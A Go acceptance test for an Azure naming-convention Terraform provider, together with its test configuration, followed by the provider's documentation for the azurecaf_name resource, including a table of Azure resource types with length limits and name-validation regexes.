				Check: resource.ComposeTestCheckFunc(
					// Storage account
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_st",
						"",
						Resources["st"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_st", regexp.MustCompile(Resources["st"].ValidationRegExp), 1),
					// Application gateway
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_agw",
						"",
						Resources["agw"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_agw", regexp.MustCompile(Resources["agw"].ValidationRegExp), 1),
					// API management
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_apim",
						"",
						Resources["apim"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_apim", regexp.MustCompile(Resources["apim"].ValidationRegExp), 1),
					// App service
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_app",
						"",
						Resources["app"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_app", regexp.MustCompile(Resources["app"].ValidationRegExp), 1),
					// Application insights
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_appi",
						"",
						Resources["appi"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_appi", regexp.MustCompile(Resources["appi"].ValidationRegExp), 1),
					// AKS cluster
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_aks",
						"",
						Resources["aks"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
					// AKS DNS prefix
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_aksdns",
						"",
						Resources["aksdns"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
					// AKS node pool (Linux)
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_aksnpl",
						"",
						Resources["aksnpl"].MaxLength,
						"pr"),
					regexMatch("azurecaf_naming_convention.random_aksnpl", regexp.MustCompile(Resources["aksnpl"].ValidationRegExp), 1),
					// AKS node pool (Windows)
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_aksnpw",
						"",
						Resources["aksnpw"].MaxLength,
						"pr"),
					regexMatch("azurecaf_naming_convention.random_aksnpw", regexp.MustCompile(Resources["aksnpw"].ValidationRegExp), 1),
					// App service environment
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_ase",
						"",
						Resources["ase"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_ase", regexp.MustCompile(Resources["ase"].ValidationRegExp), 1),
					// App service plan
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_plan",
						"",
						Resources["plan"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_plan", regexp.MustCompile(Resources["plan"].ValidationRegExp), 1),
					// Azure SQL server
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_sql",
						"",
						Resources["sql"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_sql", regexp.MustCompile(Resources["sql"].ValidationRegExp), 1),
					// Azure SQL database
					testAccCafNamingValidation(
						"azurecaf_naming_convention.random_sqldb",
						"",
						Resources["sqldb"].MaxLength,
						"utest"),
					regexMatch("azurecaf_naming_convention.random_sqldb", regexp.MustCompile(Resources["sqldb"].ValidationRegExp), 1),
				),
			},
		},
	})
}
// testAccResourceRandomConfig is the Terraform configuration used by the
// "random" naming-convention acceptance test: one azurecaf_naming_convention
// resource per resource type exercised by the test assertions above.
const testAccResourceRandomConfig = `
#Storage account test
resource "azurecaf_naming_convention" "random_st" {
name    = "catest"
prefix  = "utest"
resource_type   = "st"
convention      = "random"
}
# Application Gateway
resource "azurecaf_naming_convention" "random_agw" {
convention      = "random"
name            = "TEST-DEV-AGW-RG"
prefix          = "utest"
resource_type   = "azurerm_application_gateway"
}
# API Management
resource "azurecaf_naming_convention" "random_apim" {
convention      = "random"
name            = "TEST-DEV-APIM-RG"
prefix          = "utest"
resource_type   = "azurerm_api_management"
}
# App Service
resource "azurecaf_naming_convention" "random_app" {
convention      = "random"
name            = "TEST-DEV-APP-RG"
prefix          = "utest"
resource_type   = "azurerm_app_service"
}
# Application Insights
resource "azurecaf_naming_convention" "random_appi" {
convention      = "random"
name            = "TEST-DEV-APPI-RG"
prefix          = "utest"
resource_type   = "azurerm_application_insights"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "random_aks" {
convention      = "random"
name            = "TEST-DEV-AKS-RG"
prefix          = "utest"
resource_type   = "azurerm_kubernetes_cluster"
}
# AKS DNS prefix
resource "azurecaf_naming_convention" "random_aksdns" {
convention      = "random"
name            = "myaksdnsdemo"
prefix          = "utest"
resource_type   = "aks_dns_prefix"
}
# AKS Node Pool Linux
resource "azurecaf_naming_convention" "random_aksnpl" {
convention      = "random"
name            = "np1"
prefix          = "pr"
resource_type   = "aksnpl"
}
# AKS Node Pool Windows
resource "azurecaf_naming_convention" "random_aksnpw" {
convention      = "random"
name            = "np2"
prefix          = "pr"
resource_type   = "aksnpw"
}
# App Service Environment
resource "azurecaf_naming_convention" "random_ase" {
convention      = "random"
name            = "TEST-DEV-ASE-RG"
prefix          = "utest"
resource_type   = "azurerm_app_service_environment"
}
# App Service Plan
resource "azurecaf_naming_convention" "random_plan" {
convention      = "random"
name            = "TEST-DEV-PLAN-RG"
prefix          = "utest"
resource_type   = "azurerm_app_service_plan"
}
# Azure SQL DB Server
resource "azurecaf_naming_convention" "random_sql" {
convention      = "random"
name            = "TEST-DEV-SQL-RG"
prefix          = "utest"
resource_type   = "azurerm_sql_server"
}
# Azure SQL DB
resource "azurecaf_naming_convention" "random_sqldb" {
convention      = "random"
name            = "TEST-DEV-SQLDB-RG"
prefix          = "utest"
resource_type   = "azurerm_sql_database"
}
`
<file_sep>/docs/resources/azurecaf_name.md
# azurecaf_name
The resource azurecaf_name implements a set of methodologies to apply consistent resource naming using the default Microsoft Cloud Adoption Framework for Azure recommendations as per [naming-and-tagging](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging).
The azurecaf_name resource supersedes the previous azurecaf_naming_convention resource. This new resource provides more flexibility and will be updated on a regular basis as new Azure services are released.
The azurecaf_name resource allows you to:
* Clean inputs to make sure they remain compliant with the allowed patterns for each Azure resource
* Generate random characters to append at the end of the resource name
* Handle prefix, suffixes (either manual or as per the Azure cloud adoption framework resource conventions)
* Allow passthrough mode (simply validate the output)
## Example usage
This example outputs one name, the result of the naming convention query. The result attribute returns the name based on the convention and parameters input.
The example generates a 23 characters name compatible with the specification for an Azure Resource Group
dev-aztfmod-001
```hcl
resource "azurecaf_name" "rg_example" {
name = "demogroup"
resource_type = "azurerm_resource_group"
prefixes = ["a", "b"]
suffixes = ["y", "z"]
random_length = 5
clean_input = true
}
resource "azurerm_resource_group" "demo" {
name = azurecaf_name.rg_example.result
location = "southeastasia"
}
```
The provider generates a name using the input parameters and automatically appends a prefix (if defined), a caf prefix (resource type) and postfix (if defined) in addition to a generated padding string based on the selected naming convention.
The example above would generate a name using the pattern [prefix]-[cafprefix]-[name]-[postfix]-[5_random_chars]:
## Argument Reference
The following arguments are supported:
* **name** - (optional) the basename of the resource to create, the basename will be sanitized as per supported characters set for each Azure resources.
* **prefixes** (optional) - a list of prefix to append as the first characters of the generated name - prefixes will be separated by the separator character
* **suffixes** (optional) - a list of additional suffixes added after the basename; this can be used to append a resource index (eg. vm-001). Suffixes are separated by the separator character
* **random_length** (optional) - defaults to ``0`` : configures additional characters to append to the generated resource name. Random characters will remain compliant with the set of allowed characters per resource and will be appended before the suffix(es).
* **random_seed** (optional) - defaults to ``0`` : defines the seed to be used for the random generator. A value of 0 is not used directly; instead a seed is generated based on the Unix time of the generation.
* **resource_type** (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: azurerm_container_registry). See the Resource Type section
* **resource_types** (optional) - a list of additional resource type should you want to use the same settings for a set of resources
* **separator** (optional) - defaults to ``-``. The separator character to use between prefixes, resource type, name, suffixes, random character
* **clean_input** (optional) - defaults to ``true``. remove any noncompliant character from the name, suffix or prefix.
* **passthrough** (optional) - defaults to ``false``. Enables the passthrough mode - in that case only the clean input option is considered and the prefixes, suffixes, and random characters are ignored. The resource prefix is not added to the resulting string either
* **use_slug** (optional) - defaults to ``true``. If a slug should be added to the name - If you put false no slug (the few letters that identify the resource type) will be added to the name.
## Attributes Reference
The following attributes are exported:
* **id** - The id of the naming convention object
* **result** - The generated name for an Azure Resource based on the input parameters and the selected naming convention
* **results** - The generated names for the Azure resources based on the resource_types list
## Resource types
We define resource types as per [naming-and-tagging](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging)
Current supported resource types:
| Resource type | Resource type code (short) | minimum length | maximum length | lowercase only | validation regex |
| ------------------------| ----------------------------|-----------------|-----------------|----------------|-------------------------------------------|
| azurerm_analysis_services_server| as| 3| 63| true| "^[a-z][a-z0-9]{2,62}$"|
| azurerm_api_management_service| apim| 1| 50| false| "^[a-z][a-zA-Z0-9-][a-zA-Z0-9]{0,48}$"|
| azurerm_app_configuration| appcg| 5| 50| false| "^[a-zA-Z0-9_-]{5,50}$"|
| azurerm_role_assignment| ra| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_role_definition| rd| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_automation_account| aa| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_automation_certificate| aacert| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_credential| aacred| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_job_schedule| aajs| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_runbook| aarun| 1| 63| false| "^[a-zA-Z][a-zA-Z0-9-]{0,62}$"|
| azurerm_automation_schedule| aasched| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_variable| aavar| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_batch_account| ba| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_batch_application| baapp| 1| 64| false| "^[a-zA-Z0-9_-]{1,64}$"|
| azurerm_batch_certificate| bacert| 5| 45| false| "^[a-zA-Z0-9_-]{5,45}$"|
| azurerm_batch_pool| bapool| 3| 24| false| "^[a-zA-Z0-9_-]{1,24}$"|
| azurerm_bot_web_app| bot| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_Email| botmail| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_ms_teams| botteams| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_slack| botslack| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_directline| botline| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channels_registration| botchan| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_connection| botcon| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_redis_cache| redis| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_redis_firewall_rule| redisfw| 1| 256| false| "^[a-zA-Z0-9]{1,256}$"|
| azurerm_cdn_profile| cdnprof| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,258}[a-zA-Z0-9]$"|
| azurerm_cdn_endpoint| cdn| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_cognitive_account| cog| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,63}$"|
| azurerm_availability_set| avail| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_disk_encryption_set| des| 1| 80| false| "^[a-zA-Z0-9_]{1,80}$"|
| azurerm_image| img| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_linux_virtual_machine| vm| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_linux_virtual_machine_scale_set| vmss| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_managed_disk| dsk| 1| 80| false| "^[a-zA-Z0-9_]{1,80}$"|
| azurerm_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_containerGroups| cg| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_container_app| ca| 1| 32| true| "^[a-z0-9][a-z0-9-]{0,30}[a-z0-9]$"|
| azurerm_container_app_environment| cae| 1| 60| false| "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$"|
| azurerm_container_registry| cr| 1| 63| true| "^[a-zA-Z0-9]{1,63}$"|
| azurerm_container_registry_webhook| crwh| 1| 50| false| "^[a-zA-Z0-9]{1,50}$"|
| azurerm_kubernetes_cluster| aks| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-_]{0,61}[a-zA-Z0-9]$"|
| azurerm_cosmosdb_account| cosmos| 1| 63| false| "^[a-z0-9][a-zA-Z0-9-_.]{0,61}[a-zA-Z0-9]$"|
| azurerm_custom_provider| prov| 3| 64| false| "^[^&%?\\/]{2,63}[^&%.?\\/ ]$"|
| azurerm_mariadb_server| maria| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mariadb_firewall_rule| mariafw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mariadb_database| mariadb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mariadb_virtual_network_rule| mariavn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_server| mysql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mysql_firewall_rule| mysqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_database| mysqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mysql_virtual_network_rule| mysqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_server| psql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_postgresql_firewall_rule| psqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_database| psqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_postgresql_virtual_network_rule| psqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_database_migration_project| migr| 2| 57| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,56}$"|
| azurerm_database_migration_service| dms| 2| 62| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,61}$"|
| azurerm_databricks_workspace| dbw| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| azurerm_kusto_cluster| kc| 4| 22| false| "^[a-z][a-z0-9]{3,21}$"|
| azurerm_kusto_database| kdb| 1| 260| false| "^[a-zA-Z0-9- .]{1,260}$"|
| azurerm_kusto_eventhub_data_connection| kehc| 1| 40| false| "^[a-zA-Z0-9- .]{1,40}$"|
| azurerm_data_factory| adf| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_mysql| adfmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_postgresql| adfpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_sql_server_table| adfmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_integration_runtime_managed| adfir| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_pipeline| adfpl| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_linked_service_data_lake_storage_gen2| adfsvst| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_key_vault| adfsvkv| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_recovery_services_vault| rsv| 2| 50| false| "^[a-zA-Z][a-zA-Z0-9\\-]{1,49}$"|
| azurerm_recovery_services_vault_backup_police| rsvbp| 3| 150| false| "^[a-zA-Z][a-zA-Z0-9\\-]{1,148}[a-zA-Z0-9]$"|
| azurerm_data_factory_linked_service_mysql| adfsvmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_postgresql| adfsvpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_sql_server| adfsvmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_trigger_schedule| adftg| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_lake_analytics_account| dla| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_analytics_firewall_rule| dlfw| 3| 50| false| "^[a-z0-9-_]{3,50}$"|
| azurerm_data_lake_store| dls| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_store_firewall_rule| dlsfw| 3| 50| false| "^[a-zA-Z0-9-_]{3,50}$"|
| azurerm_dev_test_lab| lab| 1| 50| false| "^[a-zA-Z0-9-_]{1,50}$"|
| azurerm_dev_test_linux_virtual_machine| labvm| 1| 64| false| "^[a-zA-Z0-9-]{1,64}$"|
| azurerm_dev_test_windows_virtual_machine| labvm| 1| 15| false| "^[a-zA-Z0-9-]{1,15}$"|
| azurerm_frontdoor| fd| 5| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{3,62}[a-zA-Z0-9]$"|
| azurerm_frontdoor_firewall_policy| fdfw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_hdinsight_hadoop_cluster| hadoop| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_hbase_cluster| hbase| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_kafka_cluster| kafka| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_interactive_query_cluster| iqr| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_ml_services_cluster| mls| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_rserver_cluster| rser| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_spark_cluster| spark| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_storm_cluster| storm| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_iotcentral_application| iotapp| 2| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_iothub| iot| 3| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,48}[a-z0-9]$"|
| azurerm_iothub_consumer_group| iotcg| 1| 50| false| "^[a-zA-Z0-9-._]{1,50}$"|
| azurerm_iothub_dps| dps| 3| 64| false| "^[a-zA-Z0-9-]{1,63}[a-zA-Z0-9]$"|
| azurerm_iothub_dps_certificate| dpscert| 1| 64| false| "^[a-zA-Z0-9-._]{1,64}$"|
| azurerm_key_vault| kv| 3| 24| false| "^[a-zA-Z][a-zA-Z0-9-]{1,22}[a-zA-Z0-9]$"|
| azurerm_key_vault_key| kvk| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_secret| kvs| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_certificate| kvc| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_lb| lb| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_lb_nat_rule| lbnatrl| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip| pip| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip_prefix| pippf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route| rt| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route_table| route| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_subnet| snet| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_traffic_manager_profile| traf| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-.]{0,61}[a-zA-Z0-9_]$"|
| azurerm_virtual_wan| vwan| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network| vnet| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,62}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_gateway| vgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_peering| vpeer| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_interface| nic| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall| fw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_eventhub| evh| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace| ehn| 1| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_authorization_rule| ehar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_authorization_rule| ehnar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_disaster_recovery_config| ehdr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_consumer_group| ehcg| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_stream_analytics_job| asa| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_function_javascript_udf| asafunc| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_blob| asaoblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_mssql| asaomssql| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_eventhub| asaoeh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_queue| asaosbq| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_topic| asaosbt| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_reference_input_blob| asarblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_blob| asaiblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_eventhub| asaieh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_iothub| asaiiot| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_shared_image_gallery| sig| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9.]{0,78}[a-zA-Z0-9]$"|
| azurerm_shared_image| si| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9]$"|
| azurerm_snapshots| snap| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_storage_account| st| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_storage_container| stct| 3| 63| false| "^[a-z0-9][a-z0-9-]{2,62}$"|
| azurerm_storage_data_lake_gen2_filesystem| stdl| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_queue| stq| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_table| stt| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share_directory| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_machine_learning_workspace| mlw| 1| 260| false| "^[^<>*%:.?\\+\\/]{0,259}[^<>*%:.?\\+\\/ ]$"|
| azurerm_storage_blob| blob| 1| 1024| false| "^[^\\s\\/$#&]{1,1000}[^\\s\\/$#&]{0,24}$"|
| azurerm_bastion_host| bast| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_local_network_gateway| lgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_gateway| agw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_gateway| ergw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_circuit| erc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_point_to_site_vpn_gateway| vpngw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_template_deployment| deploy| 1| 64| false| "^[a-zA-Z0-9-._\\(\\)]{1,64}$"|
| azurerm_sql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_database| sqldb| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
